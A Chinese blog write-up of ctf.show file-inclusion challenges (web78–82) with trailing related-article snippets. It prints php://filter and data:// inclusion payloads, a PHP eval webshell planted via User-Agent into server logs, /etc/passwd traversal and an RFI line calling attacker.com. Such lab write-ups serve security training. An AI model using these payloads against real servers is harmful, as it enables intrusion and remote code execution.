CTF web入门之文件包含

最新推荐文章于 2025-05-22 15:05:52 发布
原创 最新推荐文章于 2025-05-22 15:05:52 发布 · 548 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#前端

web78:
在这里插入图片描述
include函数执行file引入的文件,如果执行不成功,就高亮显示当前页面的源码。

方法一:filter伪协议
file关键字的get参数传递,php://是一种协议名称,php://filter/是一种访问本地文件的协议,/read=convert.base64-encode/表示读取的方式是base64编码后,resource=index.php表示目标文件为index.php。

filter伪协议构造payload

base64编码
?file=php://filter/read=convert.base64-encode/resource=flag.php

utf8编码
?file=php://filter/convert.iconv.utf8.utf16/resource=flag.php

在这里插入图片描述
得到base编码后的flag解密得到flag在这里插入图片描述
方法二:input协议
php://input 是 PHP 提供的一个伪协议,允许开发者 访问 POST 请求的原始内容。对于 POST 请求数据,PHP 提供了 $_POST 与 $FILES 超全局变量,在客户端发起 POST 请求时,PHP 将自动处理 POST 提交的数据并将处理结果存放至 $_POST 与 $FILES 中
在这里插入图片描述
方法三:data协议
data也是利用文件包含漏洞,将输入的代码当作php文件执行。

data协议格式:
data://[<MIME-type>][;charset=<encoding>][;base64],<data>

构造payload:
?file=data://text/plain,<?php system('tac f*');?>

在这里插入图片描述
web79:同上,多了个替换php 变成大小写就可以

?file=data://text/plain,<?Php system('tac f*');?>

在这里插入图片描述
在这里插入图片描述
web80:
在这里插入图片描述
在了解过后,发现这道题还可以通过日志包含getshell的方法来做。

日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。

首先要判断网站使用的什么服务:
对于Apache,日志存放路径:/var/log/apache/access.log
对于Ngnix,日志存放路径:/var/log/nginx/access.log 和 /var/log/nginx/error.log
在这里插入图片描述
在这里插入图片描述
使用brop抓包 在User-Agent 插入一句话木马

<?php @eval($_REQUEST['cmd']);?>

@ 符号:在 PHP 里,@ 是错误抑制符。它的作用是在执行相应表达式时,抑制可能出现的错误信息输出。也就是说,即使代码执行过程中产生了错误,也不会在页面上显示错误提示。

eval() 函数:这是 PHP 中的一个内置函数,其功能是把传入的字符串当作 PHP 代码来执行。例如,若传入的字符串是 echo 'Hello, World!';eval() 函数就会执行这条语句并输出 Hello, World!$_REQUEST 超全局变量:$_REQUESTPHP 中的一个超全局变量,它会收集通过 GETPOSTCOOKIE 方式提交的数据。这里使用 $_REQUEST['cmd'] 意味着可以通过上述任意一种方式传递一个名为 cmd 的参数

在这里插入图片描述
post传参,首先查看列表 .上一步构造恶意的 cmd 参数,执行任意的 PHP 代码

cmd=system('ls');

在这里插入图片描述
可以看到目录下面有flag,直接cat查看

cmd=system('tac f*');

在这里插入图片描述
web81:同上 还是用brop 上传木马 执行命令
在这里插入图片描述

在这里插入图片描述
web82:对于搞不懂的东西,先放一下 后面在弄
这次过滤了点,⽇志包含有.log,⽤不了上面那个。
在这里插入图片描述

知识点: 在php5.4之后php.ini开始有⼏个默认选项

1.session.upload_progress.enabled = on

2.session.upload_progress.cleanup = on

3.session.upload_progress.prefix = “upload_progress_”

4.session.upload_progress.name =PHP_SESSION_UPLOAD_PROGRESS5.session.use_strict_mode=off

第⼀个表示当浏览器向服务器上传⼀个⽂件时,php将会把此次⽂件上传的详细信息(如上传时间、上传进度等)存储在session当中

第⼆个表示当⽂件上传结束后,php将会⽴即清空对应session⽂件中的内容

第三和第四个prefix+name将表示为session中的键名

第五个表示我们对Cookie中sessionID可控

"简⽽⾔之,我们可以利⽤session.upload_progress将⽊⻢写⼊session⽂件,然后包含这个session⽂件。不过前提是我们需要创建⼀个session⽂件,并且知道session⽂件的存放位置。因为session.use_strict_mode=off的关系,我们可以⾃定义sessionID

linux系统中session⽂件⼀般的默认存储位置为 /tmp 或 /var/lib/php/session 例如我们在Cookie中设置了PHPSESSID=flag,php会在服务器上创建⽂件:/tmp/sess_flag,即使此时⽤户没有初始化session,php也会⾃动初始化Session。 并产⽣⼀个键值,为prefix+name的值,最后被写⼊sess_⽂件⾥ 还有⼀个关键点就是session.upload_progress.cleanup默认是开启的,只要读取了post数据,就会清除进度信息,所以我们需要利⽤条件竞争来pass,写⼀个脚本来完成

 

enabled=on表示upload_progress功能开始,也意味着当浏览器向服务器上传一个文件时,php将会把此次文件上传的详细信息(如上传时间、上传进度等)存储在session当中 ;

cleanup=on表示当文件上传结束后,php将会立即清空对应session文件中的内容,这个选项非常重要; name当它出现在表单中,php将会报告上传进度,最大的好处是,它的值可控;

可参考:https://www.cnblogs.com/justdoIT20680/p/18771953

qq_41701460
关注
CTF-Web学习笔记:文件包含
Deng7326的博客
07-28 1089
本文系统介绍了CTF文件包含漏洞的原理与实战技巧。首先解析了本地文件包含(LFI)和远程文件包含(RFI)的核心原理,指出漏洞成因在于未严格校验用户输入路径。随后详细讲解了四种典型利用方法:包含日志文件窃取数据、利用PHP封装协议绕过限制、目录穿越突破路径限制、结合文件上传执行代码。通过一道LFI+日志泄露的综合CTF题目,展示了从漏洞发现到利用的完整过程。最后为CTF选手提供了针对性训练建议,并为开发者提出了三项防御措施:严格输入校验、关闭危险配置和日志脱敏处理。
文件包含ctf
qq_42812036的博客
10-14 2978
文件包含定义危险函数ctf文件包含PHP伪协议php://inputphp://filterdata://phar://zip://常见的敏感文件Windows 服务器敏感文件linux 服务器敏感文件 定义 在通过PHP函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外恩德文件,导致意外的文件泄露甚至恶意代码的注入。 严格来说文件包含算是代码注入的一种 危险函数 in...
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1722
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
CTF 解题 :利用文件包含漏洞获取 Flag
最新发布
井底之蛙见世界
05-22 717
本文介绍了一段存在安全漏洞的PHP代码,通过代码审计和漏洞利用获取flag.php中的Flag值。代码中存在任意文件包含漏洞(LFI),攻击者可通过未过滤的$_COOKIE['language']参数控制包含的文件路径,利用PHP伪协议读取服务器任意文件。解题思路是通过文件包含漏洞读取flag.php内容,利用php://filter伪协议以Base64编码形式读取文件源码,解码后获取Flag。关键技术点包括PHP伪协议原理、路径穿越攻击和错误信息的利用。总结中强调了漏洞利用链和CTF解题的关键点,如敏感信
CTF文件包含
qq_45086218的博客
02-28 3457
文章目录php伪协议data伪协议日志文件session文件竞争死亡绕过base64编码绕过 本文以ctf.show网站题目为例,总结ctf中的文件包含漏洞 php伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php data伪协议 ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= PD9waHAgc3lzdGVtKCdjYXQgZmxh
ctf文件包含
2401_87493916的博客
12-20 1339
⽂件包含,通过PHP函数引⼊⽂件时,传⼊的⽂件名没有经过合理的验证,从⽽操作 了预想之外的⽂件,就可能导致意外的⽂件泄漏甚⾄恶意代码注⼊。产⽣的条件: 常⻅的包含,在之前做命令执⾏的时候也已经⽤过了 include() require() include_once() require_once() 此外,常⽤的还有之前在web37写的伪协议,这⾥再复制过来。
文件包含(CTF)
ing_end的博客
04-02 1万+
文件包含 留言 连接数据库 查看留言 连接数据库 登录 连接数据库 注册 连接数据库 代码的重复 留言 查看留言 连接数据库单独的文件 登录 注册 程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某个函数的时候,直接调用此文件,无需再次编写,这种调用文件的过程通常称为包含。 程序开发人员都希望代码更加灵活,所以通常会把被包含的文件设置为变量,来进行动态调用,但正是由于这种灵活性,从而导致客户端可以
CG CTF 文件包含
qq_46389295的博客
02-23 345
题目链接 点击click me?no,跳转到添加链接描述 发现file=show.php 肯定是一个包含漏洞了,关于包含漏洞: 尝试了一下file=…/ 和test123.php发现没有用。。想到可以包含index.php来读取他自身的,也错了 翻书发现可以用php内置协议来读取php文件: http://4.chinalover.sinaapp.com/web7/index.php?file=...
CTF-文件包含(持续更新)
m0_74317362的博客
07-28 2244
任意文件包含漏洞处理方法和实例
CTF WEB文件包含
weixin_30949361的博客
09-29 605
文件包含 题目要求: 请找到题目中FLAG 漏洞源码 <meta charset='utf-8'> <center><h1>文件阅读器</h1></center> <!-- 据说flag在flag.php里 --> <?php error_reporting(0); $f=$_GET['file']; if(s...
CTF web入门之文件上传
qq_41701460的博客
04-14 1487
WEB 中进行文件上传的原理是通过将表单设为 multipart/form-data,同时加入文件域,而后通过 HTTP 协议将文件内容发送到服务器,服务器端读取这个分段 (multipart) 的数据信息,并将其中的文件内容提取出来并保存的。通常,在进行文件保存的时候,服务器端会读取文件的原始文件名,并从这个原始文件名中得出文件的扩展名,而后随机为文件起一个文件名 ( 为了防止重复 ),并且加上原始文件的扩展名来保存到服务器上。对于绕过二次渲染,人工绕过几乎不可能,这就需要使用脚本来进行构建图片马。
CTF入门到提升(一).docx
12-18
Web网络攻防是CTF的主要题型,题目涉及到许多常见的Web漏洞,如XSS、文件包含、代码执行、上传漏洞、SQL注入等。逆向工程主要包括了逆向工程中的常见题型、工具平台、解题思路。Pwn二进制漏洞利用主要考察二进制漏洞...
CTF web入门之命令执行 完整版
qq_41701460的博客
04-11 667
绕过思路:过滤了system,echo,这里可以使用passthru,但是这次还过滤了括号,所以passthru也没有办法用,这里使用文件包含,通过php://filter协议进行读取文件。可以使用使用空格绕过(%09) 也可也使用&拼接使用eval函数可以使用POST和GET其实一样的。**web36:**同web33 在前面的基础上,过滤了数字。.被过滤,则直接采用*,*表示多个字符,?**web33:**多了个双引号 和上面的题一样。**web30:**命令执行,需要严格的过滤。
CTF web入门之SQL注入
qq_41701460的博客
04-15 1046
HAVING子句用于对聚合数据进行筛选。它通常与GROUP BY一起使用。主要用于聚合函数的条件过滤,可以组合多个条件。十六进制:可以前面加x,后面用引号包裹或者0x;也可以和算数运算结合表示数字。#binascii 库:用于进行二进制数据和 ASCII 编码之间的转换,在本代码中主要用于将字符串转换为十六进制字符串。#requests 库:用于发送 HTTP 请求,在代码里会用它向目标网站发送 POST 请求来进行 SQL 注入尝试。#定义将字符串转换为十六进制字符串的函数。
ctfweb入门 文件上传
10-19
攻击者可以通过上传包含Web Shell的文件来获取服务器的控制权,或者上传包含恶意代码的图片文件来实现XSS攻击。 为了防止文件上传漏洞,需要对上传的文件进行过滤和检查。常见的过滤方式包括检查文件类型、文件大小...
ctf 文件包含总结
njqfb的博客
06-04 1791
php伪协议 文件包含用到伪协议的情况挺多 php://input php://input是个可以访问请求的原始数据的只读流,可以理解为读取到的POST上传的数据 当协议当作文件打开时,POST上传的内容相当于文件内容,enctype="multipart/form-data" 的时候 php://input 是无效的 利用: 使用php://input协议并POST要执行的代码 绕过file_get_contents函数进行的文件内容检测,比如函数打开一个文件,并验证文件内容是否为xxx,此时可以用php
CTF-文件包含学习
weixin_44770698的博客
05-30 2404
CTFSHOW WEB-17 通过请求包查看到服务器为nginx,然后尝试查看一下/etc/passwd文件。 访问成功说明可以访问内网文件,然后尝试读取日志文件中的信息。nginx的日志文件为/var/log/nginx/access.log 发现日志文件中记录了UA,所以在数据包中写入系统执行命令,所以当我们在UA中写入系统执行命令的时候,再去包含,会当做php来执行。 发现存在着indes.php 和36d.php两个文件,查看36d.php文件中的内容。 WEB-18
网络安全CTF ——web_文件包含
weixin_63274653的博客
01-27 687
通过查看php.ini文件,发现allow_url_fopen 和 allow_url_include都是打开的,所以可以判断是远程文件包含。这里URL的意思是:读取index.php的内容,并把输入流进行base64编码,不进行base64编码就如法读取源码,就看不到flag。指定第三方服务器上可运行的PHP木马,拿到webshell,查看Flag文件。直接读取目标机上的Flag文件,通常可以通过操纵变量去读取。文件包含类型分为两种,一种是本地文件包含,另一种是远程文件包含。通过给定的URL查看源码。
CTFweb学习记录 -- 文件包含
热门推荐
lifanxin的博客
05-11 1万+
文件包含概述常见文件包含函数和原理本地文件包含远程文件包含总结 概述   后端编程人员一般会把重复使用的函数写到单个文件中,需要使用时再直接调用此文件即可,因此该过程也就被称为文件包含文件包含的存在使得开发变得更加灵活和方便,但同时也带了安全问题,导致客户端可以远程调用文件,造成文件包含漏洞。这个漏洞在php中十分常见,其他语言也有。 常见文件包含函数和原理 # php include() // 执行到include时才包含文件,找不到文件产生警告,脚本继续执行 require() // 程序运行就
ctfweb 文件包含
03-31
### CTF Web 文件包含漏洞利用与解决方案 #### 背景介绍 文件包含漏洞是一种常见的Web安全漏洞,允许攻击者通过控制输入参数来访问服务器上的敏感文件或执行恶意代码。这种漏洞通常分为两种类型:本地文件包含(LFI, Local File Inclusion)和远程文件包含(RFI, Remote File Inclusion)。在CTF竞赛中,这类题目经常涉及对文件路径的操控以及协议解析机制的理解。 --- #### LFI 漏洞分析与利用示例 当应用程序未正确过滤用户输入时,可能会暴露出本地文件的内容。例如: ```php <?php $file = $_GET['file']; include($file . '.php'); ?> ``` 在这种情况下,如果`$_GET['file']`未经过滤,攻击者可以通过修改URL中的`file`参数实现任意文件读取。以下是具体实例: - **目标**:读取 `/etc/passwd` 或 `flag.php` 的内容。 - **payload**: ``` ?file=../../../../../../../../../etc/passwd%00 ``` 上述payload尝试通过目录遍历操作访问系统配置文件,并使用 `%00` 截断字符串防止 `.php` 后缀附加[^1]。 --- #### RFI 漏洞分析与利用示例 对于支持远程文件加载的应用程序,攻击者可指定外部资源作为包含的目标。例如: ```php <?php $file = $_GET['page']; include($file); ?> ``` 假设该应用运行于PHP环境并启用了`allow_url_include`选项,则可通过如下payload触发RFI漏洞: - **payload**: ``` ?page=http://attacker.com/malicious_code.php ``` 此payload会将攻击者的恶意脚本引入到受害站点上执行[^2]。 --- #### 绕过文件解析限制的方法 某些框架可能基于特定规则处理扩展名,从而阻止非法请求。然而,仍存在多种方式规避这些防护措施: - **Apache 解析漏洞** 利用不熟悉的中间扩展名迷惑解释器,最终达到预期效果。比如提交名为`shell.php.gif`的图片伪装成正常上传材料后实际却隐藏着危险指令;或者构造形似`test.php.xxx.yyy.zzz`这样的复合型命名结构,在层层剥离过程中保留有效部分得以成功注入。 - **IIS 解析特性滥用** 创建子目录形式模拟常规文档行为的同时嵌入功能性语句完成任务转换过程。像把一段简单的日期显示函数放置在一个看似普通的纯文本记录里头一样简单自然却又威力无穷。 - **Nginx 配置缺陷探索** 结合伪静态映射技巧巧妙设计地址组合使得原本无害的数据载体摇身一变成为潜在威胁源头。譬如说让一张普通JPEG图像悄悄携带上了能够被执行命令的功能模块等等。 --- #### 安全加固建议 为了防范此类风险的发生,可以从以下几个方面着手改进现有体系的安全水平: 1. 对所有来自客户端的信息进行全面验证校验工作,杜绝任何可疑成分残留下来; 2. 关闭不必要的功能开关项目,减少暴露面广度范围; 3. 实施严格的白名单策略管理可用资源列表,拒绝一切未经授权的动作企图; 4. 加强日志监控力度频率,及时发现异常状况苗头倾向以便快速响应处置[^3]。 --- ### 示例代码片段展示 以下是一段用于检测是否存在基本类型的文件包含隐患样例代码: ```php // 不安全的做法 $file = $_GET['file']; if (strpos($file, '../') !== false || strpos($file, 'http:') === 0) { die('Invalid input!'); } include $file; // 更加健壮的方式 $allowed_files = ['index', 'about', 'contact']; $file = basename($_GET['file']); if (!in_array($file, $allowed_files)) { die('File not allowed.'); } include __DIR__ . '/' . $file . '.php'; ``` ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值